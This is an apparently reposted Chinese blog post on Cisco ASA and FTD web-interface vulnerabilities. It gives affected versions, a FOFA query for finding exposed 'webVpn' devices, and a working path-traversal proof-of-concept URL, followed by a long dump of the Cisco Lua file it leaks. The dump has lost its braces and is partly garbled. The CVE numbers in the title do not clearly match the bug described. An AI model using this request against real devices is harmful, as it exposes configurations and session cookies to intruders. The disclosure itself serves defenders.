CVE-2021-40116|CVE-2021-34783等——Cicso多个安全漏洞

Posted 新网工李白

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2021-40116|CVE-2021-34783等——Cicso多个安全漏洞相关的知识,希望对你有一定的参考价值。

漏洞概述

2021年10月27日,Cisco发布安全公告,修复了Cisco Firepower 威胁防御 (FTD)、Cisco思科自适应安全设备 (ASA)和Firepower 管理中心 (FMC)中的多个安全漏洞。

CISCO ASA远程任意文件读取

Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。

Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense(FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。

影响版本

Cisco ASA 设备影响版本:

<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10

Cisco FTD设备影响版本:

6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1

漏洞复现

FOFA语法

 “webVpn”

POC

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../


-- Copyright (C) 2006-2014 by Cisco Systems, Inc.
-- Created by otrizna@cisco.com

ADD_HTTP_RESP_HEADER("X-Frame-Options", "SAMEORIGIN");

dofile("/+CSCOE+/include/common.lua")
dofile("/+CSCOE+/include/browser_inc.lua")

local function compare(a,b) return a["order"]<b["order"] end;

function INTERNAL_PASSWORD_ENABLED(name)
        return false;
end

function CONF_VIRTUAL_KEYBOARD(name)
        return false;
end

no_inheritance = false
custom_profile=""
asdm_custom_file = ""

function SetSessionData(index,name,value)

   local f1
   f1=io.open("/sessions/"..index.."/session_data","w")
   if f1 then
	io.set_metadata_int(f1,name,value)
	f1:close()
   end	
   	
end

function GetSessionData(index,name,value)

   local f1
   f1=io.open("/sessions/"..index.."/session_data","r")
   if f1 then
	local ret = io.get_metadata_int(f1,name)
	f1:close()
	return ret
   end
   return nil	
end


function xValue(value)
   if value then
      local ret = string.gsub(value,"\\"","&quot;")
      OUT(" value=\\""..ret.."\\"")
   end
end

function shtml(value)
   if value then
      ret = string.gsub(value,"&","&amp;")
      ret = string.gsub(ret,"<","&lt;")
      ret = string.gsub(ret,">","&gt;")
      return ret
   end

   return nil
   
end

function explode(str,delim)

   local ret=
   for val in string.gfind(str,"[^"..delim.."]+") do
      table.insert(ret, val)
   end

   return ret

end


function GetUrlLists()


   local url_list_name
   local url_lists = 

   local url_lists_str = SESSION_URL_LISTS()
   for url_list_name in string.gfind(url_lists_str,"[^,]+") do
      table.insert(url_lists, url_list_name)
   end

   return url_lists

end

function socket_url_parse(url, default)
    -- initialize default parameters
    local parsed = 
    for i,v in pairs(default or parsed) do parsed[i] = v end
    -- empty url is parsed to nil
    if not url or url == "" then return nil, "invalid url" end
    -- remove whitespace
    -- url = string.gsub(url, "%s", "")
    -- get fragment
--[[
    url = string.gsub(url, "#(.*)$", function(f)
        parsed.fragment = f
        return ""
    end)
--]]
    -- get scheme
    url = string.gsub(url, "^([%w][%w%+%-%.]*)%:",
        function(s) parsed.scheme = s; return "" end)
    -- get authority
    url = string.gsub(url, "^//([^/%?]*)", function(n)
        parsed.authority = n
        return ""
    end)
    -- get query stringing
    url = string.gsub(url, "%?(.*)", function(q)
        parsed.query = q
        return ""
    end)
    -- get params
    url = string.gsub(url, "%;(.*)", function(p)
        parsed.params = p
        return ""
    end)
    -- path is whatever was left
    if url ~= "" then parsed.path = url end
    local authority = parsed.authority
    if not authority then return parsed end
    authority = string.gsub(authority,"^([^@]*)@",
        function(u) parsed.userinfo = u; return "" end)

    local ipv6 = false

    if(string.sub(authority,1,1) == "[") then
       authority = string.gsub(authority,"^%[(.-)%]",
                               function(u) parsed.host = u; ipv6 = true; return "" end)
    end

    authority = string.gsub(authority, ":([^:]*)$",
        function(p) parsed.port = p; return "" end)

    if authority ~= "" and not ipv6 then parsed.host = authority end
    local userinfo = parsed.userinfo
    if not userinfo then return parsed end
    userinfo = string.gsub(userinfo, ":([^:]*)$",
        function(p) parsed.password = p; return "" end)
    parsed.user = userinfo
    return parsed
end



function ParseURL(url)

   local durl = 
    url = "",
    scheme = "",
    authority = "",
    path = "",
    params = "",
    query = "",
    fragment = "",
    userinfo = "",
    host = "",
    port = "",
    user = "",
    password = ""
  
  

  local nurl = socket_url_parse(url, durl)

  return nurl.scheme,nurl.host,nurl.port,nurl.path .. (((nurl.query or "") ~= ""  and ("?"..nurl.query)) or "")

end


function GetAppInfo(apps)
   local protocol=
   local app_info=
   for _,app in apps do
      app_info[app["id"]] = app
      if nil ~= app["protocol"] and app["mode"] ~= "disable" then
         for p in string.gfind(app["protocol"] or "","[%w]+") do
            protocol[p]=app["id"]
         end
      end
   end
   return app_info,protocol   
end

function GetLogonFields()

    local  fields= id="group",name="Group",order=100,
                    id="username",name="Username",order=200,
                    id="password",name="Password",order=300,
                    id="internal-password", name="Internal Password",order=400,
                    id="secondary-username", name="Second Username",order=500,
                    id="secondary-password", name="Second Password",order=600


    for i,fld in ipairs(fields) do
        local order = CUSTOM("auth-page/form-order/"..fields[i]["id"])
        if  fld["id"]=="internal-password" and 
            (not order or order == "") and
            CUSTOM("auth-page/logon-form/internal-password-first") == "yes" then
                order = 250 -- backward compatibility with the old customization setting 
        end
        
        if (order and order ~= "") then fld["order"]=tonumber(order) end
       
    end
    table.sort(fields,function (a,b) return a["order"] < b["order"] end)
    return fields
end



function LOAD_URL_LIST(name,absolute_path,bookmark_number)
    
   local f
   local ret=
   local sso_enabled=0;
   local name_md5 = MD5(name) 
   
   if absolute_path and "" ~= absolute_path then
      f=io.open(absolute_path,"r")
   else
      f=io.open("/bookmarks/"..name_md5,"r")
   end


   if not f then return  end

   local function get_value(value)

      if not value then return nil end
      if string.len(value) == 0 then return "" end
      return string.sub(value,2) 
   end

   local path = "/url-list/"

   local function lget_value(textdomain,value)
      if nil == value then return nil end
      if string.len(value) == 0 then return "" end
      if string.sub(value,1,1) == '+' then
         if string.len(value) > 1 then
            return gettext.dgettext(textdomain,string.sub(value,2))
         else
            return ""
         end
      else
         return string.sub(value,2) 
      end
 

以上是关于CVE-2021-40116|CVE-2021-34783等——Cicso多个安全漏洞的主要内容,如果未能解决你的问题,请参考以下文章